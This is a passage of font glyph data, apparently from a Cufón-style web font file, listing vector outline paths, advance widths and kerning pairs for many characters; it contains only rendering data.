:204},{"d":"28,-97r49,-55r35,0r-49,56r35,54r-35,0xm96,-97r49,-55r35,0r-49,56r35,54r-35,0","w":195,"k":{"\u00c6":-7,"Y":26,"V":16,"T":20,"J":-7}},{"d":"53,-104v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24","w":104},{"d":"107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm355,-61v-15,59,-107,87,-159,46r-4,15r-44,0r4,-15v-52,50,-141,1,-141,-75v0,-89,107,-140,166,-82r6,-21r44,0r-4,16v58,-54,162,5,138,97r-153,0v3,49,76,55,97,19r50,0xm318,-118v-6,-33,-52,-50,-82,-28v-9,7,-17,16,-23,28r105,0","w":375},{"d":"-5,0r50,-256r143,0r-8,44r-93,0r-12,60r93,0r-9,44r-92,0r-13,65r93,0r-9,43r-143,0xm172,-280r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0"},{"d":"96,-155v46,9,65,-65,18,-65v-22,0,-32,18,-36,40r-21,110r26,0v-6,21,15,33,34,33v18,1,34,-20,34,-39v0,-28,-32,-41,-63,-35xm115,5v-31,-2,-53,-12,-66,-31r-5,26r-48,0r37,-187v9,-45,33,-74,82,-75v40,-1,72,25,72,64v0,30,-15,54,-38,61v88,22,42,146,-34,142","w":210,"k":{"\u201e":-13,"\u201a":-13,"\u203a":6,"\u2019":18,"\u2018":16,"\u201d":18,"\u201c":16,"\u00bb":6,"-":-7}},{"d":"187,-140v0,-56,-38,-80,-98,-75r-34,174v77,8,132,-31,132,-99xm239,-145v0,87,-60,145,-146,145r-96,0r49,-256r75,0v73,0,118,39,118,111","w":249,"k":{"\u201e":13,"\u201a":13,"\u203a":6,"\u2039":6,"\u2018":6,"\u201c":6,"\u00bb":6,"\u00ab":6,"Y":13,"W":-7}},{"d":"363,-114r-6,34r-360,0r6,-34r360,0","w":360},{"d":"83,-226r9,-43r38,0r-9,43r-38,0"},{"d":"212,-213r21,18r-30,37r52,0r0,29r-71,0r-34,44r105,0r0,28r-124,0r-44,55r-21,-17r29,-38r-50,0r0,-28r69,0r35,-44r-104,0r0,-29r123,0","w":299},{"d":"83,-233v-12,2,-17,10,-19,22r17,0r-10,49r-45,0v12,-44,6,-102,63,-99","w":85,"k":{"\u00c6":50,"\u00c5":41,"y":-7,"w":-13,"r":6,"W":-15,"V":-23,"T":-7,"J":61,"A":41}},{"d":"-31,0r144,-256r53,0r56,256r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0xm142,-280r-23,0r39,-62r38,0","w":226},{"d":"168,-186v4,-33,-47,-41,-67,-22v-7,7,-12,20,-16,37r72,0r-10,31r-68,0r-5,29r68,0r-11,31r-63,0v-1,28,9,42,37,42v27,-1,35,-11,42,-35r49,0v-11,47,-39,78,-93,78v-53,0,-87,-29,-83,-85r-25,0r11,-31r19,0r6,-29r-24,0r11,-31r19,0v11,-55,34,-90,95,-90v51,-1,85,25,84,75r-48,0","w":209},{"d":"135,-215r30,0r0,93r90,0r0,29r-90,0r0,93r-30,0r0,-93r-90,0r0,-29r90,0r0,-93","w":299},{"w":104},{"d":"41,40r12,-67r-57,0r5,-31r58,0r17,-99r-57,0r5,-32r58,0r12,-67r41,0r-12,67r59,0r-4,32r-60,0r-18,99r59,0r-4,31r-60,0r-10,67r-44,0"},{"d":"202,-77v30,-1,44,-11,67,-27r0,33v-22,14,-39,22,-68,24v-20,2,-81,-25,-102,-23v-30,2,-45,11,-68,27r0,-32v21,-14,40,-22,68,-25v24,-2,83,24,103,23xm201,-145v31,-1,45,-11,68,-27r0,32v-21,15,-39,24,-68,25v-20,2,-81,-27,-102,-24v-29,3,-43,13,-68,28r0,-32v21,-15,39,-24,68,-26v23,-2,83,25,102,24","w":299},{"d":"78,-227v-16,0,-29,14,-29,29v0,16,13,29,29,29v16,0,30,-14,30,-29v0,-15,-14,-29,-30,-29xm78,-135v-37,0,-63,-26,-63,-63v0,-38,26,-63,63,-63v38,0,64,25,64,63v0,38,-26,63,-64,63xm212,-261r28,0r-137,266r-28,0xm236,-88v-15,0,-29,14,-29,30v0,16,14,30,29,30v15,0,29,-14,29,-30v0,-16,-14,-30,-29,-30xm236,5v-37,0,-63,-26,-63,-63v0,-37,26,-63,63,-63v37,0,63,26,63,63v0,37,-26,63,-63,63xm388,-88v-15,0,-30,15,-30,30v0,15,15,30,30,30v15,0,29,-14,29,-30v0,-16,-14,-30,-29,-30xm388,5v-38,0,-63,-24,-63,-63v0,-39,25,-63,63,-63v37,0,63,26,63,63v0,38,-26,63,-63,63","w":465},{"d":"98,-220v-23,0,-36,16,-38,38r-43,0v4,-48,34,-79,85,-79v57,0,93,54,67,104v-12,24,-71,62,-71,90r-44,0v-1,-58,69,-78,80,-122v0,-18,-16,-31,-36,-31xm85,0r-45,0r10,-48r45,0","w":183},{"d":"165,-104v-1,-30,-21,-53,-52,-53v-36,-1,-61,31,-60,68v0,29,21,52,50,52v35,0,63,-31,62,-67xm101,5v-54,2,-95,-40,-93,-93v3,-65,40,-109,107,-111v53,-1,96,39,94,93v-3,67,-40,109,-108,111xm137,-227r9,-40r36,0r-9,40r-36,0xm76,-227r9,-40r36,0r-9,40r-36,0","w":218},{"d":"89,-196v11,41,87,55,87,115v0,44,-33,71,-75,74r-8,40r-38,0r8,-43v-30,-14,-49,-34,-47,-77r46,-1v-2,25,10,38,34,38v19,1,34,-13,32,-30v-5,-44,-87,-54,-87,-110v0,-39,28,-65,66,-68r6,-35r39,0r-8,37v28,10,44,29,43,67r-46,0v0,-19,-7,-31,-25,-31v-15,-1,-27,11,-27,24","w":209},{"d":"162,-118v-5,-34,-54,-50,-84,-28v-9,7,-16,16,-21,28r105,0xm52,-80v3,49,76,55,97,19r50,0v-16,39,-48,65,-99,66v-54,2,-95,-40,-93,-93v2,-64,40,-109,107,-110v63,-1,103,51,91,118r-153,0xm146,-218r-21,0r-53,-62r37,0","w":218},{"d":"127,5v-69,1,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,118,46,116,117v-2,91,-52,148,-144,149xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72xm149,-326v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38","w":281},{"d":"125,-116v-15,83,19,209,-104,189r4,-45v31,3,42,-4,45,-36r9,-108r-43,0r4,-41r43,0v1,-70,17,-113,97,-104r-4,45v-43,-6,-46,21,-47,59r46,0r-3,41r-47,0","w":209},{"d":"45,-32r210,0r0,30r-210,0r0,-30xm135,-212r30,0r0,59r90,0r0,29r-90,0r0,58r-30,0r0,-58r-90,0r0,-29r90,0r0,-59","w":299},{"d":"-6,23v12,-2,18,-11,20,-23r-17,0r10,-48r45,0v-12,44,-7,100,-63,98","w":85,"k":{"\u0141":6,"\uf002":6,"\uf001":6,"\u0152":20,"\u00d8":20,"\u00c6":-13,"\u00c5":-7,"w":15,"f":6,"Y":40,"X":-7,"W":11,"V":33,"T":23,"O":20,"L":6,"G":13,"C":20,"A":-7}},{"d":"262,-47r15,-63r-55,63r40,0xm283,0r-31,0r5,-24r-69,0r5,-25r86,-94r35,0r-21,96r18,0r-5,23r-18,0xm226,-261r26,0r-154,266r-26,0xm57,-110v-31,0,-55,-17,-50,-47v9,1,24,-3,29,2v-1,14,7,21,21,21v15,0,26,-8,26,-23v-1,-17,-12,-23,-32,-23r5,-24v16,0,31,-3,30,-18v-1,-19,-31,-16,-33,1r-29,0v2,-47,93,-51,93,-2v-1,19,-12,30,-31,33v16,5,28,16,28,35v1,27,-28,45,-57,45","w":323},{"d":"193,-94v-5,63,-32,94,-104,94r-102,0r9,-43v50,5,71,-26,62,-71r-49,0r9,-43r26,0v-30,-83,77,-135,138,-84v15,13,23,31,23,54r-46,0v-1,-20,-14,-29,-35,-30v-32,-2,-46,36,-29,60r68,0r-8,43r-50,0v9,29,1,58,-20,71v43,5,61,-11,62,-51r46,0","w":209},{"d":"28,-97r49,-55r35,0r-49,56r35,54r-35,0","w":127,"k":{"\u00c6":-7,"Y":26,"V":16,"T":20,"J":-7}},{"d":"9,23v12,-3,17,-10,19,-23r-16,0r9,-48r45,0v-10,45,-7,100,-62,98","w":103},{"d":"46,-31r209,0r0,29r-209,0r0,-29xm46,-215r208,69r0,25r-208,69r0,-31r156,-51r-156,-50r0,-31","w":299},{"d":"-5,0r50,-256r143,0r-8,44r-93,0r-12,60r93,0r-9,44r-92,0r-13,65r93,0r-9,43r-143,0xm147,-280r-21,0r-53,-62r37,0"},{"d":"91,5v-51,0,-88,-31,-81,-84r47,-1v-1,25,10,42,34,42v25,0,43,-17,42,-42v0,-30,-20,-40,-52,-40r8,-44v27,2,48,-8,48,-31v0,-37,-50,-28,-54,1r-45,0v9,-42,29,-67,77,-67v40,-1,71,26,71,64v-1,32,-19,52,-49,57v26,10,44,30,44,64v0,46,-41,81,-90,81","w":209},{"d":"143,-102v7,-27,2,-57,-28,-55v-66,5,-53,102,-72,157r-44,0r38,-193r41,0r-5,18v26,-30,100,-29,115,10v28,-48,137,-43,131,31v-3,40,-17,94,-23,134r-47,0r23,-126v3,-37,-48,-38,-65,-16v-24,32,-25,96,-37,142r-47,0","w":335},{"d":"100,-256r45,0r-10,48r-45,0xm87,-36v23,0,36,-16,38,-38r43,0v-3,48,-33,79,-85,79v-57,0,-93,-54,-67,-104v12,-24,71,-62,71,-90r44,0v1,58,-68,78,-79,122v-1,19,16,32,35,31","w":183},{"d":"-4,0r50,-256r66,0r59,198r39,-198r47,0r-50,256r-65,0r-59,-200r-39,200r-48,0xm150,-326v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38","w":251},{"d":"65,-89v-7,28,-2,57,28,55v67,-5,54,-103,73,-159r44,0r-39,193r-40,0r4,-16v-39,42,-132,21,-118,-60r21,-117r47,0xm124,-218r-23,0r39,-62r38,0","w":209},{"d":"118,-199v32,0,48,8,63,26r5,-25r43,0r-50,261r-44,0r15,-75v-56,41,-147,-3,-141,-76v5,-66,41,-111,109,-111xm105,-37v35,0,61,-31,60,-66v0,-30,-19,-53,-50,-53v-35,0,-62,31,-61,67v1,30,19,52,51,52","w":229},{"d":"53,-89v-4,59,84,67,102,21r47,0v-13,42,-48,73,-100,73v-55,1,-94,-39,-94,-93v0,-117,175,-153,199,-37r-46,0v-21,-55,-117,-29,-108,36xm77,-280r21,0r23,35r38,-35r23,0r-45,62r-37,0","w":210},{"d":"8,-184v0,-65,86,-98,127,-55r4,-17r34,0r-29,135r-33,0r2,-9v-39,32,-105,0,-105,-54xm126,-194v0,-21,-17,-36,-38,-36v-25,0,-46,21,-46,46v0,22,16,37,38,37v26,0,46,-22,46,-47","w":173},{"d":"318,-118v-6,-33,-51,-50,-82,-29v-9,7,-17,17,-23,29r105,0xm165,-104v0,-30,-22,-52,-52,-52v-35,0,-61,30,-60,67v0,29,21,52,50,52v35,0,62,-31,62,-67xm256,5v-33,0,-61,-14,-75,-35v-46,64,-180,34,-173,-58v5,-64,40,-110,108,-110v36,0,58,15,75,36v17,-22,44,-36,80,-36v61,0,103,51,90,118r-153,0v3,49,76,55,97,19r50,0v-16,39,-48,65,-99,66","w":375},{"d":"165,-104v-1,-30,-21,-53,-52,-53v-36,-1,-61,31,-60,68v0,29,21,52,50,52v35,0,63,-31,62,-67xm101,5v-54,2,-95,-40,-93,-93v3,-65,40,-109,107,-111v53,-1,96,39,94,93v-3,67,-40,109,-108,111xm150,-218r-21,0r-53,-62r37,0","w":218},{"d":"232,-256r-51,72r30,0r-6,28r-45,0r-24,34r62,0r-5,28r-75,0r-18,94r-48,0r19,-94r-74,0r5,-28r61,0r-11,-34r-43,0r5,-28r28,0r-24,-72r49,0r35,110r74,-110r56,0","w":204},{"d":"122,-156v-35,0,-61,31,-60,67v0,29,21,53,50,52v34,0,62,-31,61,-67v-1,-30,-19,-52,-51,-52xm110,5v-32,0,-48,-8,-63,-26r-16,84r-44,0r62,-319r43,0r-14,75v57,-41,145,3,140,76v-5,66,-41,110,-108,110","w":231},{"d":"103,-93v-76,-6,8,-151,-76,-135r0,-32v52,-1,76,7,76,62v0,48,-8,97,49,89r0,31v-55,-8,-51,40,-49,90v2,55,-24,62,-76,61r0,-31v82,18,1,-129,76,-135"},{"d":"10,-119v0,-106,105,-171,205,-128r30,-35r31,25r-30,35v65,88,-3,227,-119,227v-27,0,-48,-5,-65,-16r-33,38r-29,-26r33,-38v-16,-20,-23,-46,-23,-82xm181,-208v-75,-29,-145,50,-113,129xm97,-51v74,38,154,-49,114,-131","w":281,"k":{"\u201e":13,"\u201a":13,"\u203a":10,"\u2039":6,"\u2019":16,"\u201d":16,"\u00bb":10,"\u00ab":6,"Y":15,"X":8,";":-7,":":-7,".":15,"-":-10,",":15}},{"d":"75,-168v15,-20,34,-31,67,-31r-8,45v-84,-4,-66,93,-86,154r-47,0r37,-193r42,0","w":137,"k":{"\u201e":34,"\u201a":34,"\u2039":13,"\u2019":-8,"\u2018":-7,"\u201d":-8,"\u201c":-7,"\u00ab":13,"z":6,"y":-7,"w":-7,"v":-7,"r":6,"g":6,".":43,"-":6,",":43}},{"d":"100,-97r-48,55r-35,0r49,-55r-36,-55r35,0","w":127,"k":{"\u00c6":13,"\u00c5":13,"Z":13,"Y":40,"X":20,"W":16,"V":29,"T":33,"A":13}},{"d":"127,-218r-21,0r-53,-62r37,0"},{"d":"103,-284v-13,0,-24,11,-24,24v0,13,11,23,24,23v13,0,24,-10,24,-23v0,-13,-11,-24,-24,-24xm103,-215v-25,0,-45,-21,-45,-46v0,-25,20,-45,45,-45v25,0,45,20,45,45v0,25,-20,46,-45,46"},{"d":"-4,0r49,-256r138,0r-8,44r-88,0r-12,60r88,0r-8,44r-88,0r-21,108r-50,0xm253,-168v15,-20,34,-31,67,-31r-8,45v-84,-4,-66,93,-86,154r-47,0r37,-193r42,0","w":315},{"d":"115,-261v65,-3,102,66,64,120v-23,32,-74,70,-108,98r107,0r-8,43r-173,0r9,-44v38,-34,99,-80,128,-116v18,-21,12,-58,-18,-58v-25,1,-37,20,-40,46r-46,0v5,-50,35,-87,85,-89","w":209},{"d":"103,-224v-33,0,-45,-17,-44,-51v6,1,16,-2,20,1v0,18,7,25,26,24v22,0,32,-8,40,-25r20,0v-9,30,-26,51,-62,51"},{"d":"9,0r18,-94r-28,16r8,-43r29,-17r22,-118r50,0r-18,97r41,-24r-8,44r-42,24r-14,71r84,0r-8,44r-134,0","w":179,"k":{"\u203a":13,"\u2039":26,"\u2019":48,"\u2018":53,"\u201d":48,"\u201c":53,"\u0153":20,"\u0152":26,"\u00bb":13,"\u00ab":26,"\u00f8":20,"\u00e6":20,"\u00d8":26,"y":20,"u":20,"o":20,"e":20,"a":20,"Y":40,"W":6,"V":13,"U":20,"T":26,"O":26,"-":13}},{"d":"112,-261v46,0,80,28,74,74r-49,0v1,-20,-9,-33,-26,-33v-15,0,-33,14,-30,29v7,40,92,51,92,115v0,48,-38,81,-86,81v-54,0,-84,-31,-82,-87r49,0v-2,26,10,41,33,41v27,0,45,-32,29,-53v-24,-31,-86,-39,-86,-94v0,-45,36,-73,82,-73xm86,-342r21,0r23,35r38,-35r23,0r-45,62r-37,0","w":193},{"d":"59,-280r21,0r23,35r38,-35r23,0r-45,62r-37,0"},{"d":"46,-31r208,0r0,29r-208,0r0,-29xm254,-215r0,31r-156,50r156,51r0,31r-208,-69r0,-25","w":299},{"d":"123,-210r-67,173r133,0xm100,-259r45,0r101,259r-247,0","w":245},{"d":"259,-145v-1,52,-19,80,-49,108r53,0r0,37r-105,0r0,-40v34,-20,56,-54,57,-105v0,-47,-31,-83,-77,-83v-47,-1,-78,36,-77,85v0,48,24,84,57,103r0,40r-106,0r0,-37r54,0v-29,-27,-48,-56,-49,-105v-1,-72,49,-124,121,-124v70,0,122,52,121,121","w":275},{"d":"11,-90v-8,-85,116,-140,169,-75r8,-43r-53,0r5,-25r52,0r5,-23r45,0r-4,23r28,0r-5,25r-28,0r-40,208r-45,0r3,-13v-54,46,-149,-2,-140,-77xm107,-37v66,0,86,-116,9,-116v-33,0,-60,29,-60,63v0,31,21,53,51,53","w":236},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm128,-264v19,0,46,17,51,-6r18,0v-4,36,-38,43,-71,30v-9,1,-13,6,-16,14r-19,0v7,-21,14,-38,37,-38","w":231},{"d":"27,-259r223,0r0,328r-50,0r0,-285r-123,0r0,285r-50,0r0,-328","w":277},{"d":"11,-90v0,-91,113,-142,169,-78r5,-25r46,0r-39,193r-44,0r3,-13v-54,46,-140,-2,-140,-77xm107,-37v67,0,85,-120,10,-120v-34,0,-61,32,-61,66v0,31,20,54,51,54xm165,-218r-21,0r-53,-62r37,0","w":231},{"d":"80,-227v-16,0,-30,14,-30,29v0,15,14,29,30,29v16,0,29,-13,29,-29v0,-16,-13,-29,-29,-29xm80,-135v-37,0,-63,-24,-63,-63v0,-39,26,-63,63,-63v37,0,63,26,63,63v0,37,-26,63,-63,63xm213,-261r29,0r-137,266r-29,0xm237,-88v-15,0,-29,14,-29,30v0,16,14,30,29,30v15,0,30,-15,30,-30v0,-15,-15,-30,-30,-30xm237,5v-38,0,-63,-25,-63,-63v0,-37,25,-63,63,-63v37,0,63,26,63,63v0,39,-26,63,-63,63","w":315},{"d":"0,0r38,-193r44,0r-37,193r-45,0","w":84},{"d":"-4,0r8,-40r136,-172r-100,0r8,-44r162,0r-8,39r-137,172r114,0r-9,45r-174,0","w":210,"k":{"\u203a":13,"\u2039":33,"\u2018":6,"\u201c":6,"\u00bb":13,"\u00ab":33,"-":20}},{"d":"95,-216v-8,-31,-45,-15,-45,11r-30,0v3,-31,23,-54,56,-54v41,0,67,38,42,72v-15,20,-48,42,-71,59r70,0r-5,26r-114,0r6,-27r84,-68v5,-6,7,-13,7,-19","w":137},{"d":"182,-160v0,-25,-28,-24,-54,-24r0,46v26,0,54,2,54,-22xm215,-164v0,22,-14,36,-33,40r33,66r-35,0r-29,-61r-23,0r0,61r-31,0r0,-146v51,1,117,-9,118,40xm261,-127v0,-67,-44,-112,-111,-112v-67,0,-111,46,-111,111v0,65,44,110,109,110v67,0,113,-42,113,-109xm20,-128v0,-77,51,-130,130,-130v79,0,130,52,130,130v0,78,-53,130,-130,130v-77,0,-130,-53,-130,-130","w":299},{"d":"139,-93v0,-44,-64,-56,-81,-21r-40,-13r49,-129r128,0r-8,42r-89,0r-17,47v55,-23,107,17,107,75v0,55,-41,97,-96,97v-54,0,-87,-30,-86,-83v13,2,34,-4,43,2v-1,25,18,40,42,40v30,0,48,-25,48,-57","w":209},{"d":"57,0r-45,0r9,-48r45,0","w":104},{"d":"5,0r19,-97r-30,17r7,-37r30,-18r24,-121r45,0r-20,104r29,-16r-6,37r-31,17r-22,114r-45,0","w":94},{"d":"111,-117r-8,41r-91,0r8,-41r91,0","w":122},{"d":"53,-104v-13,0,-24,-11,-24,-24v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-11,24,-24,24","w":104},{"d":"62,-223r-32,0r6,-33r82,0r-64,328r-82,0r7,-33r33,0","w":106},{"d":"-31,0r144,-256r53,0r56,256r-51,0r-12,-54r-105,0r-30,54r-55,0xm149,-102r-19,-91r-50,91r69,0xm196,-280r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":226},{"d":"131,-42v34,0,57,-17,73,-39r55,0v-19,50,-66,86,-131,86v-75,0,-119,-47,-122,-119v-5,-114,127,-187,222,-123v22,15,35,38,42,65r-55,0v-11,-26,-33,-42,-68,-41v-56,1,-86,39,-89,95v-1,45,30,76,73,76xm155,-280r-23,0r39,-62r38,0","w":273},{"d":"136,-135v0,-31,-28,-36,-59,-33r-14,69v37,1,73,0,73,-36xm188,-136v-2,68,-55,88,-133,82r-11,54r-50,0r50,-256r50,0r-9,46v61,-4,105,18,103,74","w":203},{"d":"75,-147v-29,4,-19,32,0,46r33,25v25,-4,18,-35,0,-44xm72,41v-41,0,-67,-19,-65,-61r40,0v1,16,9,23,25,24v18,1,34,-17,21,-33v-23,-29,-80,-43,-80,-94v0,-25,18,-40,41,-45v-33,-36,-2,-96,50,-93v41,3,65,18,63,60r-40,0v1,-18,-7,-25,-24,-25v-35,0,-18,33,4,49v26,19,60,38,62,78v1,25,-19,41,-43,44v35,37,-1,96,-54,96"},{"d":"162,-118v-5,-34,-54,-50,-84,-28v-9,7,-16,16,-21,28r105,0xm52,-80v3,49,76,55,97,19r50,0v-16,39,-48,65,-99,66v-54,2,-95,-40,-93,-93v2,-64,40,-109,107,-110v63,-1,103,51,91,118r-153,0xm133,-227r9,-40r36,0r-9,40r-36,0xm72,-227r9,-40r36,0r-9,40r-36,0","w":218},{"d":"150,-233v-12,2,-17,10,-19,22r16,0r-9,49r-45,0v10,-45,6,-101,63,-99xm83,-233v-12,2,-17,10,-19,22r17,0r-10,49r-45,0v12,-44,6,-102,63,-99","w":152,"k":{"\u00c6":50,"\u00c5":41,"y":-7,"w":-13,"r":6,"W":-15,"V":-23,"T":-7,"J":61,"A":41}},{"d":"100,-97r-49,55r-34,0r49,-55r-36,-55r35,0xm168,-97r-48,55r-35,0r49,-55r-36,-55r35,0","w":195,"k":{"\u00c6":13,"\u00c5":13,"Z":13,"Y":40,"X":20,"W":16,"V":29,"T":33,"A":13}},{"d":"23,0r-14,-193r43,0r5,135r63,-135r42,0r9,134r64,-134r46,0r-99,193r-43,0r-13,-130r-59,130r-44,0","w":264,"k":{"\u201e":21,"\u201a":21,"\u203a":13,"\u2039":15,"\u2019":-7,"\u2018":-17,"\u201d":-7,"\u201c":-17,"\u00bb":13,"\u00ab":15,".":26,"-":10,",":26}},{"d":"107,0r49,-256r45,0r-49,256r-45,0xm49,-193v6,-50,37,-71,94,-65v-4,13,-4,30,-9,41v-24,-1,-39,2,-41,24r29,0r-8,40r-29,0r-30,153r-44,0r30,-153r-28,0r8,-40r28,0","w":192},{"d":"-5,0r50,-256r143,0r-8,44r-93,0r-12,60r93,0r-9,44r-92,0r-13,65r93,0r-9,43r-143,0xm134,-289r9,-40r36,0r-9,40r-36,0xm73,-289r9,-40r36,0r-9,40r-36,0"},{"d":"85,-145r-45,0r10,-48r45,0xm57,0r-45,0r9,-48r45,0","w":110},{"d":"131,-42v34,0,57,-17,73,-39r55,0v-19,50,-66,86,-131,86v-75,0,-119,-47,-122,-119v-5,-114,127,-187,222,-123v22,15,35,38,42,65r-55,0v-11,-26,-33,-42,-68,-41v-56,1,-86,39,-89,95v-1,45,30,76,73,76xm116,-342r21,0r23,35r38,-35r23,0r-45,62r-37,0","w":273},{"d":"-8,63r50,-84r-35,-172r48,0r23,121r74,-121r50,0r-158,256r-52,0xm100,-218r-23,0r39,-62r38,0","w":185},{"d":"161,-257r38,0r87,99r-36,0r-70,-70r-70,70r-37,0","w":360},{"d":"112,-128v-12,54,65,77,72,26r29,0v-1,32,-29,52,-63,52v-43,0,-70,-32,-70,-77v0,-64,64,-102,114,-67v12,8,17,21,18,35r-29,0v-2,-17,-16,-27,-34,-27v-27,1,-37,27,-37,58xm261,-128v0,-67,-44,-111,-111,-111v-68,0,-111,46,-111,111v0,65,45,110,111,110v66,0,111,-44,111,-110xm20,-128v0,-77,51,-130,130,-130v79,0,130,52,130,130v0,78,-53,130,-130,130v-77,0,-130,-53,-130,-130","w":299},{"d":"67,-113v-8,32,-5,71,31,68v40,-4,40,-26,49,-73r27,-138r49,0v-18,75,-23,193,-64,238v-42,45,-164,27,-147,-62r34,-176r49,0xm188,-280r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":220},{"d":"127,5v-69,1,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,118,46,116,117v-2,91,-52,148,-144,149xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72xm186,-280r-21,0r-53,-62r37,0","w":281},{"d":"51,0r20,-97r-54,-159r50,0r35,110r74,-110r57,0r-113,159r-18,97r-51,0","w":204,"k":{"\u201e":46,"\u201a":46,"\u203a":40,"\u2039":51,"\u0153":29,"\u00bb":40,"\u00ab":51,"\u00f8":29,"\u00e6":29,"\u00c5":23,"u":29,"o":29,"i":6,"e":29,"a":29,"A":23,";":24,":":24,".":51,"-":43,",":51}},{"d":"8,-89v1,-71,55,-113,131,-100r-14,-24r-62,11r-5,-27r53,-10r-13,-23r43,0r9,15r43,-7r6,27r-34,6v19,34,44,68,44,117v0,65,-42,106,-108,109v-54,2,-94,-40,-93,-94xm165,-102v0,-32,-20,-52,-52,-52v-36,0,-61,28,-60,67v0,29,21,50,50,50v36,1,63,-29,62,-65","w":218},{"d":"159,-108r22,-104r-12,0r-70,104r60,0xm136,0r14,-67r-79,0r-46,67r-55,0r177,-256r182,0r-8,44r-93,0r-11,60r92,0r-8,44r-93,0r-13,65r93,0r-8,43r-144,0","w":325,"k":{"\u203a":13,"\u2039":20,"\u2019":10,"\u2018":13,"\u201d":10,"\u201c":13,"\u00bb":13,"\u00ab":20,"-":-7}},{"d":"-4,0r49,-256r50,0r-49,256r-50,0xm58,-288r9,-43r38,0r-9,43r-38,0","w":90},{"d":"106,-82v-28,0,-52,-24,-52,-52v0,-28,24,-52,52,-52v28,0,52,24,52,52v0,28,-24,52,-52,52","w":212},{"d":"94,-261r26,0r-154,266r-26,0","w":60},{"d":"127,5v-69,1,-118,-47,-117,-116v2,-92,54,-148,145,-150v70,-2,118,46,116,117v-2,91,-52,148,-144,149xm150,-213v-53,0,-89,43,-89,98v0,43,28,73,70,73v53,0,90,-43,90,-99v0,-44,-27,-72,-71,-72xm211,-280r-21,0r-23,-36r-38,36r-23,0r45,-62r37,0","w":281},{"d":"75,-72r31,0r0,134r-31,0r0,-134xm75,-252r31,0r0,134r-31,0r0,-134"},{"d":"49,-193v7,-50,36,-71,94,-65v-4,13,-4,30,-9,41v-25,-1,-39,2,-41,24r29,0r-8,40r-29,0r-30,153r-44,0r30,-153r-28,0r8,-40r28,0","w":114,"k":{"\u201e":6,"\u201a":6,"\u2019":-25,"\u2018":-25,"\u201d":-25,"\u201c":-25,"y":-7,"w":-7,".":20,",":20}},{"d":"53,-89v-4,59,84,67,102,21r47,0v-13,42,-48,73,-100,73v-55,1,-94,-39,-94,-93v0,-117,175,-153,199,-37r-46,0v-21,-55,-117,-29,-108,36xm116,-218r-23,0r39,-62r38,0","w":210},{"d":"253,-207r0,33r-164,67r164,67r0,32r-207,-85r0,-28","w":299},{"d":"123,-193v0,-22,-15,-37,-38,-37v-26,0,-45,20,-45,47v0,21,16,36,37,36v25,0,46,-21,46,-46xm157,-195v6,92,-151,106,-151,13v0,-48,33,-76,81,-78v40,-2,68,27,70,65","w":163},{"d":"148,-214r8,-42r45,0r-8,42r-45,0xm107,0r37,-193r45,0r-38,193r-44,0xm49,-193v6,-50,37,-71,94,-65v-4,13,-4,30,-9,41v-24,-1,-39,2,-41,24r29,0r-8,40r-29,0r-30,153r-44,0r30,-153r-28,0r8,-40r28,0","w":192},{"d":"15,-252r29,0r0,97r-29,0r0,-97","w":58},{"d":"162,-118v-5,-34,-54,-50,-84,-28v-9,7,-16,16,-21,28r105,0xm52,-80v3,49,76,55,97,19r50,0v-16,39,-48,65,-99,66v-54,2,-95,-40,-93,-93v2,-64,40,-109,107,-110v63,-1,103,51,91,118r-153,0xm117,-218r-23,0r39,-62r38,0","w":218},{"d":"200,0v-33,7,-73,3,-71,-33v1,-22,15,-92,21,-123r-47,0r-30,156r-40,0r30,-156v-20,-2,-27,6,-29,23r-31,0v8,-41,15,-57,60,-57r168,0r-7,34r-34,0r-20,110v-3,20,19,20,35,16","w":240},{"d":"56,-234r6,-26r97,0r-6,26r-97,0"},{"d":"247,-108v0,-33,-37,-52,-60,-28v-7,8,-16,20,-24,38v12,37,84,40,84,-10xm53,-107v0,33,37,52,60,28v7,-8,16,-19,24,-37v-11,-37,-84,-40,-84,9xm209,-37v-31,0,-41,-20,-57,-46v-14,25,-27,46,-57,46v-34,0,-58,-33,-58,-70v0,-38,20,-71,54,-71v31,0,41,21,57,46v14,-26,27,-45,59,-46v32,-1,56,35,56,70v0,38,-20,71,-54,71","w":299},{"d":"-4,0r50,-256r66,0r59,198r39,-198r47,0r-50,256r-65,0r-59,-200r-39,200r-48,0","w":251},{"d":"0,55r180,0r0,30r-180,0r0,-30"},{"d":"107,46v2,46,-58,42,-96,29r8,-20v18,8,55,18,60,-7v0,-15,-18,-12,-35,-13r12,-35r16,0v-1,5,-6,13,-5,17v23,0,40,7,40,29"},{"d":"13,0r30,-153r-26,0r8,-40r26,0r12,-61r46,0r-11,61r27,0r-7,40r-28,0r-30,153r-47,0","w":118},{"d":"180,-114r-7,34r-173,0r7,-34r173,0"},{"d":"92,-205v0,-18,-15,-32,-33,-32v-18,-1,-33,14,-32,32v0,18,14,33,32,33v18,0,33,-15,33,-33xm8,-204v0,-29,23,-54,51,-53v28,0,52,25,52,53v0,28,-24,51,-52,51v-27,0,-51,-22,-51,-51","w":118},{"d":"165,-104v-1,-30,-21,-53,-52,-53v-36,-1,-61,31,-60,68v0,29,21,52,50,52v35,0,63,-31,62,-67xm101,5v-54,2,-95,-40,-93,-93v3,-65,40,-109,107,-111v53,-1,96,39,94,93v-3,67,-40,109,-108,111","w":218,"k":{"\u201e":-7,"\u201a":-7,"\u2018":6,"\u201c":6,"-":-7